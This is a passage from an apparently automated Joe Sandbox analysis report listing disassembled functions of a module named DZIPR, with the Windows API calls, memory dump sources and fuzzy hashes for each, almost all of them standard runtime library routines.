                                          • GetLastError.KERNEL32(?,6C52A5D4,00000000,00000001,00000000,?,6C52A89E,00000018,6C53E978,0000000C,6C52A92F,00000000,00000000,?,6C52A32A,0000000D), ref: 6C524691
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                          • String ID:
                                          • API String ID: 2714421763-0
                                          • Opcode ID: 520a616fe4ca64baefd6080287f3453a56d37a7c963c8be7f9792eab5784e7df
                                          • Instruction ID: 229d0604ac128dde6e694fdf081d3a7ec85fd501ca60737158d733d16a38d54a
                                          • Opcode Fuzzy Hash: 520a616fe4ca64baefd6080287f3453a56d37a7c963c8be7f9792eab5784e7df
                                          • Instruction Fuzzy Hash: 9701D631901725EADF205FB19C04F9E3BF49F4132DF610509E014A6AC0DB7DE9449E99
                                          Function 6C51C113 Relevance: 7.5, APIs: 5, Instructions: 36COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • TlsFree.KERNEL32(?,?,?,6C51C179), ref: 6C51C13B
                                          • GlobalHandle.KERNEL32(?), ref: 6C51C149
                                          • GlobalUnlock.KERNEL32(00000000), ref: 6C51C152
                                          • GlobalFree.KERNEL32(00000000), ref: 6C51C159
                                          • RtlDeleteCriticalSection.NTDLL ref: 6C51C163
                                            • Part of subcall function 6C51BF5D: RtlEnterCriticalSection.NTDLL(?), ref: 6C51BFBC
                                            • Part of subcall function 6C51BF5D: RtlLeaveCriticalSection.NTDLL(?), ref: 6C51BFCC
                                            • Part of subcall function 6C51BF5D: LocalFree.KERNEL32(?), ref: 6C51BFD5
                                            • Part of subcall function 6C51BF5D: TlsSetValue.KERNEL32(?,00000000), ref: 6C51BFE7
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                          • String ID:
                                          • API String ID: 1549993015-0
                                          • Opcode ID: beca9045447b62ffe7a3772a0477b6fa64c2dbee1a0175bccca39aded37244af
                                          • Instruction ID: 5c6d48289263be97a5ecd26817791d96e0daf96e0d6d88ba0bba03a44b84a0b8
                                          • Opcode Fuzzy Hash: beca9045447b62ffe7a3772a0477b6fa64c2dbee1a0175bccca39aded37244af
                                          • Instruction Fuzzy Hash: B4F0E9323446009BEB206B389C4CE1B37B99FC6674326021AF429C3B41DB31EC038779
                                          Function 6C5196DA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetMenuCheckMarkDimensions.USER32 ref: 6C5196F2
                                          • _memset.LIBCMT ref: 6C51976A
                                          • LoadBitmapW.USER32(00000000,00007FE3), ref: 6C5197E5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: BitmapCheckDimensionsLoadMarkMenu_memset
                                          • String ID:
                                          • API String ID: 3130454499-3916222277
                                          • Opcode ID: 934f8aff59d2b41587f9ac8e2e8b99f644d21d9aed3fd0f7513f52c3f0e84615
                                          • Instruction ID: f28ae02be5c98c1e2c21d639ba0c6e1cdc82510b0bbaffdfa16eafe683ac60dd
                                          • Opcode Fuzzy Hash: 934f8aff59d2b41587f9ac8e2e8b99f644d21d9aed3fd0f7513f52c3f0e84615
                                          • Instruction Fuzzy Hash: 32313871B002159BEF208F289CC8BA97BB4FF45308F4580A6E549D7681DB349D498F50
                                          Function 6C52ED77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(KERNEL32,6C5277D7), ref: 6C52ED7C
                                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 6C52ED8C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: IsProcessorFeaturePresent$KERNEL32
                                          • API String ID: 1646373207-3105848591
                                          • Opcode ID: c4f8433d77dd9f09abc79a9d0a71e4188c8f8dca7549aed07959aae9b09cfe77
                                          • Instruction ID: 49b18a3558df42c55fbcfd7da1208ecf0fe833ddf644e063761108b7ce248c61
                                          • Opcode Fuzzy Hash: c4f8433d77dd9f09abc79a9d0a71e4188c8f8dca7549aed07959aae9b09cfe77
                                          • Instruction Fuzzy Hash: 7AF03630600909D2DF105FF1AD2D65F7BB9BB81746F420994D19AE05C4EF7480749299
                                          Function 6C53053C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • ___addlocaleref.LIBCMT ref: 6C53054E
                                            • Part of subcall function 6C530414: InterlockedIncrement.KERNEL32(00000000), ref: 6C530426
                                            • Part of subcall function 6C530414: InterlockedIncrement.KERNEL32(?), ref: 6C530433
                                            • Part of subcall function 6C530414: InterlockedIncrement.KERNEL32(?), ref: 6C530440
                                            • Part of subcall function 6C530414: InterlockedIncrement.KERNEL32(?), ref: 6C53044D
                                            • Part of subcall function 6C530414: InterlockedIncrement.KERNEL32(?), ref: 6C53045A
                                            • Part of subcall function 6C530414: InterlockedIncrement.KERNEL32(?), ref: 6C530476
                                            • Part of subcall function 6C530414: InterlockedIncrement.KERNEL32(?), ref: 6C530486
                                            • Part of subcall function 6C530414: InterlockedIncrement.KERNEL32(?), ref: 6C53049C
                                          • ___removelocaleref.LIBCMT ref: 6C530559
                                            • Part of subcall function 6C5304A3: InterlockedDecrement.KERNEL32(00000000), ref: 6C5304BD
                                            • Part of subcall function 6C5304A3: InterlockedDecrement.KERNEL32(?), ref: 6C5304CA
                                            • Part of subcall function 6C5304A3: InterlockedDecrement.KERNEL32(?), ref: 6C5304D7
                                            • Part of subcall function 6C5304A3: InterlockedDecrement.KERNEL32(?), ref: 6C5304E4
                                            • Part of subcall function 6C5304A3: InterlockedDecrement.KERNEL32(?), ref: 6C5304F1
                                            • Part of subcall function 6C5304A3: InterlockedDecrement.KERNEL32(?), ref: 6C53050D
                                            • Part of subcall function 6C5304A3: InterlockedDecrement.KERNEL32(?), ref: 6C53051D
                                            • Part of subcall function 6C5304A3: InterlockedDecrement.KERNEL32(?), ref: 6C530533
                                          • ___freetlocinfo.LIBCMT ref: 6C53056D
                                            • Part of subcall function 6C5302CB: ___free_lconv_mon.LIBCMT ref: 6C530311
                                            • Part of subcall function 6C5302CB: ___free_lconv_num.LIBCMT ref: 6C530332
                                            • Part of subcall function 6C5302CB: ___free_lc_time.LIBCMT ref: 6C5303B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                          • String ID: P)Tl
                                          • API String ID: 467427115-1191581938
                                          • Opcode ID: 6027c97ef8c6db992a89b2e299bd646ed207aaa6e97d07d0150d1d15c782a183
                                          • Instruction ID: 1cbfc99095c2165bc9892a78241263622021115416c0ac59dfdd2e5c850db9b3
                                          • Opcode Fuzzy Hash: 6027c97ef8c6db992a89b2e299bd646ed207aaa6e97d07d0150d1d15c782a183
                                          • Instruction Fuzzy Hash: C2E04832903BB1958B111928BC902BA57944FD1E39B352157F86CE7D45FB248E8161BD
                                          Function 6C517D71 Relevance: 6.1, APIs: 4, Instructions: 131timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: File$SizeTime_memset
                                          • String ID:
                                          • API String ID: 151880914-0
                                          • Opcode ID: d384324cc10411b2fefed7f163dc6f43bfa7298fb5627e4af6a74e7cdbebf057
                                          • Instruction ID: 10985767d064466c3af0d996d3f4d42f952bab36205c2bf547e380e9a3742a14
                                          • Opcode Fuzzy Hash: d384324cc10411b2fefed7f163dc6f43bfa7298fb5627e4af6a74e7cdbebf057
                                          • Instruction Fuzzy Hash: 34510B71508605DFEB24CF68CC44D9AB7F8FB49364F104A1EE4A6D3A90E730E944CB64
                                          Function 6C53081B Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6C53084F
                                          • __isleadbyte_l.LIBCMT ref: 6C530883
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,6C5240D8,6C53BF84,00000000,00000000,?,?,?,?,6C5240D8,00000000,?), ref: 6C5308B4
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,6C5240D8,00000001,00000000,00000000,?,?,?,?,6C5240D8,00000000,?), ref: 6C530922
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: 41922396f395d1f077da56048838dbab05187af35f9c6f69ca9759fa4c9ff152
                                          • Instruction ID: 88ab44a36db794e5d88601c640e0e520492aa1e66cd50c89b6f2a3141b7fb1c1
                                          • Opcode Fuzzy Hash: 41922396f395d1f077da56048838dbab05187af35f9c6f69ca9759fa4c9ff152
                                          • Instruction Fuzzy Hash: EF31E231A013E9EFDB00CF64CC80AAEBBB5BF81314F15456AE8689B591FB30D951DB90
                                          Function 6C51C4CF Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: __msize_malloc
                                          • String ID:
                                          • API String ID: 1288803200-0
                                          • Opcode ID: 076c8ffbf8a57e90cb8397fe052492af68da67bccd0553d9386619fd7180d7d9
                                          • Instruction ID: 7f5af46c77db2f268b8a74048099ab611bf9a45fe60ecd27408bb571c243a8d3
                                          • Opcode Fuzzy Hash: 076c8ffbf8a57e90cb8397fe052492af68da67bccd0553d9386619fd7180d7d9
                                          • Instruction Fuzzy Hash: 0121D671109610DFEB15AF34DCC8A9A3FE5AF41758B21853AD8288BE92DB35FC44CA81
                                          Function 6C5188C8 Relevance: 6.1, APIs: 4, Instructions: 66memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalLock.KERNEL32(?), ref: 6C5188E7
                                          • lstrcmpW.KERNEL32(00000000,?), ref: 6C5188F4
                                          • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6C51892E
                                          • GlobalLock.KERNEL32(00000000), ref: 6C518938
                                            • Part of subcall function 6C51DAD1: GlobalFlags.KERNEL32(?), ref: 6C51DAE0
                                            • Part of subcall function 6C51DAD1: GlobalUnlock.KERNEL32(?), ref: 6C51DAF2
                                            • Part of subcall function 6C51DAD1: GlobalFree.KERNEL32(?), ref: 6C51DAFD
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Global$Lock$AllocFlagsFreeUnlocklstrcmp
                                          • String ID:
                                          • API String ID: 2391069079-0
                                          • Opcode ID: 5e63e9cf1cc468ab997524d51e74058fe0e90661c487a8a5f9b39c9b64cc5d80
                                          • Instruction ID: f5e2ff2646a87693896ce76123a4f9dd28d4a507c2d5f09a46716d0e1cbe75b9
                                          • Opcode Fuzzy Hash: 5e63e9cf1cc468ab997524d51e74058fe0e90661c487a8a5f9b39c9b64cc5d80
                                          • Instruction Fuzzy Hash: BC116D71508A04FADB229BA5CC48DAF7BBDFBC5B04B51045AFA05D2A20E731D904E721
                                          Function 6C51BF5D Relevance: 6.1, APIs: 4, Instructions: 61COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(?), ref: 6C51BFBC
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 6C51BFCC
                                          • LocalFree.KERNEL32(?), ref: 6C51BFD5
                                          • TlsSetValue.KERNEL32(?,00000000), ref: 6C51BFE7
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                          • String ID:
                                          • API String ID: 2949335588-0
                                          • Opcode ID: 92835782e020ee5c8e2544e227cb226298cd0cc9add385450f63ea4d6c4cbcae
                                          • Instruction ID: 11274082934b6b805a4b10c552f4def9ba5efb7a47cd955a69a1baf6d81f0260
                                          • Opcode Fuzzy Hash: 92835782e020ee5c8e2544e227cb226298cd0cc9add385450f63ea4d6c4cbcae
                                          • Instruction Fuzzy Hash: AE1167B1601604EFE714EF64CC88F5AB7B4FF46319F20842AF1668BAA1CB71A950CF50
                                          Function 6C51D159 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 6C51D194
                                          • RegCloseKey.ADVAPI32(00000000), ref: 6C51D19D
                                          • swprintf.LIBCMT ref: 6C51D1BA
                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6C51D1CB
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ClosePrivateProfileStringValueWriteswprintf
                                          • String ID:
                                          • API String ID: 22681860-0
                                          • Opcode ID: 38ad119740e154cbe4bbe1ff99bc9885b7fe8e59500354773938560f8c5472e4
                                          • Instruction ID: c10aab0fad8f2baecc7fabd49d144ddc6119813501d14702a2e5305dfa230dbb
                                          • Opcode Fuzzy Hash: 38ad119740e154cbe4bbe1ff99bc9885b7fe8e59500354773938560f8c5472e4
                                          • Instruction Fuzzy Hash: CB01A172640308ABDB119A648C49FAB77BCAF49718F11041AF900E7680EB74ED0487A4
                                          Function 6C516A83 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 6C516A8A
                                            • Part of subcall function 6C5168E2: _malloc.LIBCMT ref: 6C516900
                                          • __CxxThrowException@8.LIBCMT ref: 6C516AC0
                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000800,6C5116A6,00000000,00000000,?,?,6C53D898,00000004,6C5116A6,00000000,6C5169F9,00000000), ref: 6C516AEA
                                          • LocalFree.KERNEL32(6C5116A6,6C5116A6,00000000,6C5169F9,00000000), ref: 6C516B12
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
                                          • String ID:
                                          • API String ID: 1776251131-0
                                          • Opcode ID: 85081af4a9c2c80ed402afed32d6b9a348ad58bf04f25ba4c6c4b0849e24232d
                                          • Instruction ID: c1cb77fff512661de20d0214510334ef0e28e67f824779f09d583964a55fe9e7
                                          • Opcode Fuzzy Hash: 85081af4a9c2c80ed402afed32d6b9a348ad58bf04f25ba4c6c4b0849e24232d
                                          • Instruction Fuzzy Hash: 5E114C71644309EFEF04DF68CC44AA93BF5EF88314F20C929B929CAA90EB3199508B54
                                          Function 6C517287 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6C5168E2: _malloc.LIBCMT ref: 6C516900
                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6C5172BB
                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 6C5172C1
                                          • DuplicateHandle.KERNEL32(00000000), ref: 6C5172C4
                                          • GetLastError.KERNEL32(?), ref: 6C5172DF
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                          • String ID:
                                          • API String ID: 3704204646-0
                                          • Opcode ID: 5a4b466ef411bdf5a1b0bc46fdf79f9a650308d6acbb7bf2e6724c92fcc7df78
                                          • Instruction ID: c7ca9fbda9e01052756d10cc78d2e7f9724d8e07eec66fdaa8844605f575d106
                                          • Opcode Fuzzy Hash: 5a4b466ef411bdf5a1b0bc46fdf79f9a650308d6acbb7bf2e6724c92fcc7df78
                                          • Instruction Fuzzy Hash: 6701B131704601ABEB108BAACC8CF5A7BA9EFC4394F244412F918CBA41EF70DD018764
                                          Function 6C520F8D Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTopWindow.USER32(?), ref: 6C520F9D
                                          • GetTopWindow.USER32(00000000), ref: 6C520FDC
                                          • GetWindow.USER32(00000000,00000002), ref: 6C520FFA
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Window
                                          • String ID:
                                          • API String ID: 2353593579-0
                                          • Opcode ID: e923418ae03a4a2812159a5a840d723a231f459abe0313cfafd78c21ae28b017
                                          • Instruction ID: c4536b0554bfa0ef42e5b53ade75fe2230eb35f08853f0dae2867a5a8a9b107e
                                          • Opcode Fuzzy Hash: e923418ae03a4a2812159a5a840d723a231f459abe0313cfafd78c21ae28b017
                                          • Instruction Fuzzy Hash: 8B01803204619AFBCF225F918D08EDF3FA6EF89354F014012FA14555A0D73AC572EBA5
                                          Function 6C52EC63 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                          • Instruction ID: 9a439e8331d03eae6a57c5c27709a8818d700adf40923bef04b5ca3b79a2770e
                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                          • Instruction Fuzzy Hash: 7811727244014ABBCF125F94CC41CDD3FA2BB59359B188414FA28655B0C77ACAB1AB81
                                          Function 6C5203CF Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,?), ref: 6C5203DC
                                          • GetTopWindow.USER32(00000000), ref: 6C5203EF
                                            • Part of subcall function 6C5203CF: GetWindow.USER32(00000000,00000002), ref: 6C520436
                                          • GetTopWindow.USER32(?), ref: 6C52041F
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Window$Item
                                          • String ID:
                                          • API String ID: 369458955-0
                                          • Opcode ID: 1f85970a4372202f2338c8bfd21d10346ddd177771694b9f79468f3187b8f529
                                          • Instruction ID: babbb9de96754592bfe59e9499236fc98952dd5c0bae063c215cd0ec71eb3be6
                                          • Opcode Fuzzy Hash: 1f85970a4372202f2338c8bfd21d10346ddd177771694b9f79468f3187b8f529
                                          • Instruction Fuzzy Hash: 4B01D832103595A7DF221E518C24ECF3AE5AFC13A8B45C123FD1891681E738C91186D5
                                          Function 6C51C220 Relevance: 6.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(6C5434A8), ref: 6C51C25A
                                          • RtlInitializeCriticalSection.NTDLL(?), ref: 6C51C26C
                                          • RtlLeaveCriticalSection.NTDLL(6C5434A8), ref: 6C51C279
                                          • RtlEnterCriticalSection.NTDLL(?), ref: 6C51C289
